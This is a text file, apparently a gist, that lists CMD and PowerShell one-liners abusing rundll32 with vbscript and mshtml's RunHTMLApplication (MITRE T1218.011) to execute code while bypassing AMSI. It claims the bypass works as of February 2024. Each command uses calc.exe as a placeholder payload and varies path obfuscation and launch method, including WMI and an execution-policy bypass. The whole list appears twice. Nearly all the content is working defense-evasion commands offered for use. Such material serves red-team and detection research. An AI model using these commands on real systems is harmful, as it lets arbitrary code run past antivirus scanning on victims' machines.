bobby-tablez/proxy_execution_bypass_T1218.txt

## proxy_execution_bypass_T1218.txt
# A list of CMD/PowerShell scripts which leverage the T1218.011 proxy execution technique. Currently bypasses AMSI as of 02/2024.

# CMD
rundll32 vbscript:"\\..\\mshtml\\..\\fishsticks\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)

rundll32 vbscript:"\\\\..\\\\mshtml\\\\..\\\\mshtml\\\\..\\\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)

rundll32 vbscript:"/\/\../\/\mshtml/\/\../\/\mshtml/\/\../\/\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)

rundll32 vbscript:"\\....\\mshtm\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)

rundll32 vbscript:"\\..../\/\fishsticks\\..\\../\/\mshtml/\/\..\\../\/\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)


# PowerShell
Start-Process cmd.exe -ArgumentList '/c', 'rundll32 vbscript:"\\..\\mshtml\\..\\fishsticks\\..\\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("calc.exe"),0)'

Invoke-Expression -Command "cmd.exe /c rundll32 vbscript:`"\\..\\mshtml\\..\\fishsticks\\..\\mshtml,RunHTMLApplication `"+String(CreateObject(`"WScript.Shell`").Run(`"calc.exe`"),0)"

Start-Job -ScriptBlock { Start-Process "rundll32.exe" -ArgumentList 'vbscript:"\\..\\mshtml\\..\\fishsticks\\..\\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("calc.exe"),0)' }

Set-ExecutionPolicy Bypass -Scope Process; & cmd /c 'rundll32 vbscript:"\\..\\mshtml\\..\\fishsticks\\..\\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("calc.exe"),0)'

$scriptBlock = {cmd.exe /c rundll32 vbscript:"\\..\\mshtml\\..\\fishsticks\\..\\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("calc.exe"),0)};Invoke-Command -ScriptBlock $scriptBlock -ComputerName $env:computername

Invoke-WmiMethod -Path Win32_Process -Name Create -ArgumentList "rundll32.exe vbscript:`"\\..\\mshtml\\..\\fishsticks\\..\\mshtml,RunHTMLApplication `",`"String(CreateObject(`"WScript.Shell`").Run(`"calc.exe`"),0)`""
	# A list of CMD/PowerShell scripts which leverage the T1218.011 proxy execution technique. Currently bypasses AMSI as of 02/2024.

	# CMD
	rundll32 vbscript:"\\..\\mshtml\\..\\fishsticks\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)

	rundll32 vbscript:"\\\\..\\\\mshtml\\\\..\\\\mshtml\\\\..\\\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)

	rundll32 vbscript:"/\/\../\/\mshtml/\/\../\/\mshtml/\/\../\/\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)

	rundll32 vbscript:"\\....\\mshtm\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)

	rundll32 vbscript:"\\..../\/\fishsticks\\..\\../\/\mshtml/\/\..\\../\/\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)


	# PowerShell
	Start-Process cmd.exe -ArgumentList '/c', 'rundll32 vbscript:"\\..\\mshtml\\..\\fishsticks\\..\\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("calc.exe"),0)'

	Invoke-Expression -Command "cmd.exe /c rundll32 vbscript:`"\\..\\mshtml\\..\\fishsticks\\..\\mshtml,RunHTMLApplication `"+String(CreateObject(`"WScript.Shell`").Run(`"calc.exe`"),0)"

	Start-Job -ScriptBlock { Start-Process "rundll32.exe" -ArgumentList 'vbscript:"\\..\\mshtml\\..\\fishsticks\\..\\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("calc.exe"),0)' }

	Set-ExecutionPolicy Bypass -Scope Process; & cmd /c 'rundll32 vbscript:"\\..\\mshtml\\..\\fishsticks\\..\\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("calc.exe"),0)'

	$scriptBlock = {cmd.exe /c rundll32 vbscript:"\\..\\mshtml\\..\\fishsticks\\..\\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("calc.exe"),0)};Invoke-Command -ScriptBlock $scriptBlock -ComputerName $env:computername

	Invoke-WmiMethod -Path Win32_Process -Name Create -ArgumentList "rundll32.exe vbscript:`"\\..\\mshtml\\..\\fishsticks\\..\\mshtml,RunHTMLApplication `",`"String(CreateObject(`"WScript.Shell`").Run(`"calc.exe`"),0)`""